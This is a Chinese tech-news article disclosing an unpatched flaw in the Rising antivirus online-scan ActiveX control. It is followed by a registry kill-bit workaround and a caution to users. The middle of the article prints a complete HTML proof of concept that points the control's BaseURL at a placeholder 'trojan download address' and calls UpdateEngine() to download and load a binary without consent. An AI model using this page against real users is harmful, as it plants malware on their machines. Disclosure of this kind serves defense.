【IT168 专稿】互联网在给网民带来方便的同时，也成为计算机病毒传播的主要途径。随着计算机病毒的变形速度和破坏力的不断提高，以及混合型病毒的出现，使得病毒的隐蔽性更加强大，不知不觉“中毒”带来的后果更为严重。

    网民使用最多的一些软件将成为计算机病毒的主要攻击对象。在百度搜霸、风暴影音、realplayer、等常用工具相继出现溢出代码之后，近期瑞星杀软的溢出代码又被公布于网络，此代码目前不但免杀而且只需简单几行代码即可将病毒不经过用户允许偷偷下载到安装有瑞星杀毒软件在线杀毒控件的电脑上。

    瑞星在其主站提供了免费在线查毒服务（http://online.rising.com.cn/free/index.htm ）。在执行免费查毒时，站点会要求用户安装Rising Web Scan Object ActiveX控件（OL2005.dll）。该控件的UpdateEngine()方式没有正确地验证某些参数输入，因此可能导致向用户系统上下载并加载恶意的二进制程序。代码如下：

    <html>
    <head><title>Rising Online Scanner Insecure Method Vulnerability</title></head>
    <body>
    <object style="display:none" classid="clsid:E4E2F180-CB8B-4DE9-ACBB-DA745D3BA153" height="265" id="rav"    width="430" VIEWASTEXT>
    <param NAME="BackColor" VALUE="#ECECEC">
    <param NAME="ForeColor" VALUE="#000000">
    </object>
    <script>
    function test()
    {
    rav.BaseURL = "木马的下载地址"
    rav.Encardid = "0000$0000$0000";
    rav.UpdateEngine();
    }
    </script>
    <input type="button" value=" Go " onclick="test()"><br><br>
    wait for a few seconds after clicking the button
    </body></html>
    别有用心者只需将以上代码简单修改保存为HTML即可利用。目前网上也出现了生成工具。如图：

    目前瑞星厂商没有推出相应补丁，使用在线杀毒的用户可使用临时解决方案，给{E4E2F180-CB8B-4DE9-ACBB-DA745D3BA153}设置一个KINGLLBIT，如下：

    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{E4E2F180-CB8B-4DE9-ACBB-DA745D3BA153}]
    "Compatibility Flags"=dword:00000400 （为设置后的值）

    编者按：这里建议网民在遇到有控件下载的页面弹出时，一定要多加注意，严防死守，以保安全！